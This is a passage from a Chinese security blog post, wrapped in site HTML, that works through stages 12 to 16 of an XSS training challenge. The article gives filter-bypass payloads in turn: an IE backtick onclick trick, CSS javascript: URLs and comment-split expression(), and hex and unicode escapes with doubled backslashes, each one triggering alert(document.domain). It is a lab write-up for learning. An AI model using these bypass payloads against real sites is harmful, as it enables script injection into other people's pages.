</tbody></table>
</li>
<li><p>闭合input标签，通过外部标签触发XSS</p>
<table>
<thead>
<tr>
<th align="center"><code>1111&quot;&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827055558.png" srcset="/img/loading.gif" alt=""></td>
</tr>
<tr>
<td align="center"><code>执行后发现引号和尖括号都给过滤了，没有能够闭合input标签</code></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>IE特性讲解</strong></p>
<ul>
<li>IE中两个反引号’’可以闭合一个左边双引号</li>
</ul>
<p><strong>插入payload</strong></p>
<ul>
<li><p>注意onclick前面的两个是反引号不是引号，是数字1键左边的反引号</p>
<table>
<thead>
<tr>
<th align="center">```onclick=alert(document.domain)`</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><code>插入后ie将两个反引号解析成了双引号，闭合了value，从而执行了payload</code></td>
</tr>
<tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827055754.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<h2 id="stage13-利用css特性绕过xss过滤"><a href="#stage13-利用css特性绕过xss过滤" class="headerlink" title="stage13-利用css特性绕过xss过滤"></a>stage13-利用css特性绕过xss过滤</h2><ul>
<li><p>输入恶意字符，F12审查</p>
<table>
<thead>
<tr>
<th align="center"><code>插入qweradsf，发f12查看源代码，直接插入到value中同时也插入到了style中</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827055917.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>过滤发现</strong></p>
<ul>
<li><p>HTML事件触发XSS,双引号闭合value，并没有成功。</p>
<table>
<thead>
<tr>
<th align="center"><code>所有输入都被当作字符串插入到value中了</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827060009.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>闭合iput标签来触发XSS</p>
<table>
<thead>
<tr>
<th align="center"><code>发现双引号同样没能闭合，payload同样被当作字符串插入到value中</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827060154.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>CSS特性讲解</strong></p>
<ul>
<li>background:url(javascript:alert(document.domain));设置背景颜色</li>
<li>background设置背景颜色,利用JavaScript伪协议执行js，目前只有ie浏览器支持，其他浏览器不支持</li>
</ul>
<p><strong>插入payload触发XSS</strong></p>
<ul>
<li><p>使用ietester，打开低版本ie</p>
<ul>
<li>输入payload，成功验证触发XSS，查看源代码发现</li>
</ul>
<table>
<thead>
<tr>
<th align="center"><code>payload被当style的属性执行了</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827060330.png" srcset="/img/loading.gif" alt=""></td>
</tr>
<tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827060348.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<h2 id="stage14-ie中利用css触发xss"><a href="#stage14-ie中利用css触发xss" class="headerlink" title="stage14-ie中利用css触发xss"></a>stage14-ie中利用css触发xss</h2><p><strong>CSS介绍</strong></p>
<ul>
<li>层叠样式表(英文全程:cascading style sheets)是一种用来表现HTML(标准通用标记语言的一个应用或)或XML(标准通用标记语言的一个子集)等文件样式的计算机语言。CSS不仅可以通过静态修饰网页，还可以配合各种脚本语言动态的对网页各元素进行格式化</li>
</ul>
<p><strong>CSS中执行javascript</strong></p>
<ul>
<li>css expression(css表达式)又称Dynamic preperties(动态属性)，是微软早期DHTML的产物，因其可以在CSS中定义表达式来达到建立元素    间属性之间的联系等作用，从ie5开始得到支持，后因标准，性能，安全等问题，微软从ie2 beta2标准模式开始取消对css expression的支持</li>
<li>实际应用<ul>
<li>早期很多开发人员利用css expression实现了许多效果，比如将元素相对鼠标指针进行定位，根据一个定时器来移动元素等等。当然这些效果能够使用js来实现</li>
<li>虽然css表达式问题很多，但依然能在网上看到它的影子，甚至一些成熟的商业网站上。最常见的一个应用就是悬浮在页面上的某个模块(比如导航，返回顶部)</li>
</ul>
</li>
</ul>
<p><strong>注释绕过关键字过滤</strong></p>
<ul>
<li><p>CSS中的注释/**/</p>
</li>
<li><p>绕过关键字对expression的过滤。express/**/ion</p>
</li>
<li><p>插入了xss:expression</p>
<table>
<thead>
<tr>
<th align="center"><code>发现冒号后面的expression全部被转义了</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827060625.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>使用css注释符来绕过过滤</p>
<table>
<thead>
<tr>
<th align="center"><code>xss:expre/**/ssion，成功的将expression插入</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827060706.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>插入payload触发xss</strong></p>
<pre><code class="hljs css"><span class="hljs-selector-tag">payload</span>：
xss:expres/**/sion(if(!window.x)&#123;alert(document.domain);window.x=1&#125;)</code></pre>

<pre><code class="hljs css">代码解析：
对expression进行了绕过之后，对window.x进行判断，这是一个不存在的信息，会直接执行alert函数，执行完之后window.x=1 ，然后上面的判断成立了，就不执行alert函数了。</code></pre>

<ul>
<li><p>插入后弹出了域名</p>
<table>
<thead>
<tr>
<th align="center"><code>查看源代码发现expression并没被注释</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827060853.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<h2 id="stage15-16进制绕过过滤"><a href="#stage15-16进制绕过过滤" class="headerlink" title="stage15-16进制绕过过滤"></a>stage15-16进制绕过过滤</h2><p><strong>十六进制介绍</strong></p>
<ul>
<li><p>十六进制转换有16进制每一位上可以是从小道道为0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F十六个大小不同的数，即逢16进一，其中用A,B,C,D,E,F(字母不区分大小写)这六个字母分别表示10，11，12，13，14，15</p>
</li>
<li><p>可以使用python将字符转换为16进制类型</p>
<ul>
<li>需要用到binascii模块</li>
<li>print “\\x”+binascii.b2a_hex(“&lt;&gt;”)</li>
</ul>
<table>
<thead>
<tr>
<th align="center">\\x将16进制转换成可以执行的js代码</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827060953.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<ul>
<li><p>插入恶意字符，F12查找</p>
<table>
<thead>
<tr>
<th align="center"><code>插入1111111111&lt;&gt;，发现有个input</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827061128.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>尝试闭合通过事件来触发XSS，发现并没有能闭合，</p>
<table>
<thead>
<tr>
<th align="center"><code>当作字符串输入了</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827061205.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>通过闭合input标签，通过外部标签来触发XSS。同样被当作字符串给输入了。</p>
<table>
<thead>
<tr>
<th align="center"><code>说明这里不存在XSS</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827061332.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>往下滑动，发现下面存在了一个document.write的js脚本。将用户输入的尖括号都进行转义了，可能存在XSS，但需要绕过过滤</p>
</li>
</ul>
<p>**插入payload触发XSS</p>
<ul>
<li><p>将&lt;&gt;转换成16进制字符串分别为3c,3e  在前面加上\x表示这是一个js可识别的16进制编码</p>
<table>
<thead>
<tr>
<th align="center"><code>将\3c\3e输入后，发现\被过滤，双写\就可以绕过</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827061451.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>\x加上16进制编码才是js可执行的16进制编码</p>
<table>
<thead>
<tr>
<th align="center"><code>\\\3cscript\\\3ealert(document.domain)\\\3c/script\\\3e</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827061540.png" srcset="/img/loading.gif" alt=""></td>
</tr>
<tr>
<td align="center"><code>绕过过滤，触发了弹窗</code></td>
</tr>
</tbody></table>
</li>
</ul>
<h2 id="stage16-unicode绕过过滤触发XSS"><a href="#stage16-unicode绕过过滤触发XSS" class="headerlink" title="stage16-unicode绕过过滤触发XSS"></a>stage16-unicode绕过过滤触发XSS</h2><p><strong>unicode 介绍</strong></p>
<ul>
<li><p>Unicode(统一码，万国码，单一码)是计算机科学领域里的一项业界标准，包括字符集，编码方案等，Unicode是为了解决川通服的字符编码方案的局限而产生的，它为每种语言钟的每个字符设定同意并且唯一的二进制编码，以满足跨语言，跨平台进行文本转换，处理要求</p>
</li>
<li><p>使用python将字符转换为unicode类型</p>
<table>
<thead>
<tr>
<th align="center"><code>\\u表示js可识别的Unicode编码</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827061750.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>过滤探测</strong> </p>
<ul>
<li><p>输入十六进制转换的&lt;&gt;，发现并没有变成&lt;&gt;</p>
<table>
<thead>
<tr>
<th align="center"><code>说明这里已经不能再使用十六进制来绕过了</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827061903.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>双斜杠加unicode进行绕过</strong></p>
<ul>
<li><p>将unicode编码的&lt;&gt;进行 与\\u00结合js可识别的unicode编码</p>
<table>
<thead>
<tr>
<th align="center"><code>\\\u003c aaa\\u003e</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827061951.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>插入payload触发xss</strong></p>
<table>
<thead>
<tr>
<th align="center">```\u003cscript\u003ealert(document.domain)\u003c/script\u003e``</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200827062041.png" srcset="/img/loading.gif" alt=""></td>
</tr>
<tr>
<td align="center"><code>网页直接将payload当作js脚本执行，弹出了域名</code></td>
</tr>
</tbody></table>

            </article>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/Web-penetration/">Web penetration</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/xss/">xss</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" target="_blank" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <div class="post-prev col-6">
                    
                    
                      <a href="/2020/08/08/csrf%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">csrf漏洞利用</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </div>
                  <div class="post-next col-6">
                    
                    
                      <a href="/2020/08/06/xss+setookit%E7%9B%97%E5%8F%96%E7%94%A8%E6%88%B7%E4%BF%A1%E6%81%AF/">
                        <span class="hidden-mobile">xss+setookit窃取账户信息</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </div>
                </div>
              
            </div>

            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Power by SuQieR</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Hexo theme by Fluid</span></a>
    </div>
    
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


    
  <!-- 备案信息 -->
  <div class="beian">
    <a href="http://beian.miit.gov.cn/" target="_blank"
       rel="nofollow noopener">京 ICP 备 20020711 号</a>
    
      <a
        href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=20020711"
        rel="nofollow noopener"
        class="beian-police"
        target="_blank"
      >
        <span class="beian-police-sep">&nbsp;|&nbsp;</span>
        
          <img src="/img/police_beian.png" srcset="/img/loading.gif" alt="police-icon" />
        
        <span>京公网安备 11010802032018 号</span>
      </a>
     
  </div>


    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: 'article.markdown-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "xss-challgens通关记录&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>







  
  
    <script type="text/javascript">
      //定义获取词语下标
      var a_idx = 0;
      jQuery(document).ready(function ($) {
        //点击body时触发事件
        $("body").click(function (e) {
          //需要显示的词语
          var a = new Array("富强", "民主", "文明", "和谐", "自由", "平等", "公正", "法治", "爱国", "敬业", "诚信", "友善");
          //设置词语给span标签
          var $i = $("<span/>").text(a[a_idx]);
          //下标等于原来下标+1  余 词语总数
          a_idx = (a_idx + 1) % a.length;
          //获取鼠标指针的位置，分别相对于文档的左和右边缘。
          //获取x和y的指针坐标
          var x = e.pageX, y = e.pageY;
          //在鼠标的指针的位置给$i定义的span标签添加css样式
          $i.css({
            "z-index": 999,
            "top": y - 20,
            "left": x,
            "position": "absolute",
            "font-weight": "bold",
            "color": rand_color()
          });
          // 随机颜色
          function rand_color() {
            return "rgb(" + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + ")"
          }
          //在body添加这个标签
          $("body").append($i);
          //animate() 方法执行 CSS 属性集的自定义动画。
          //该方法通过CSS样式将元素从一个状态改变为另一个状态。CSS属性值是逐渐改变的，这样就可以创建动画效果。
          //详情请看http://www.w3school.com.cn/jquery/effect_animate.asp
          $i.animate({
            //将原来的位置向上移动180
            "top": y - 180,
            "opacity": 0
            //1500动画的速度
          }, 1500, function () {
            //时间到了自动删除
            $i.remove();
          });
        });
      })
      ;
    </script>
  











  

  

  

  

  

  





</body>
</html>
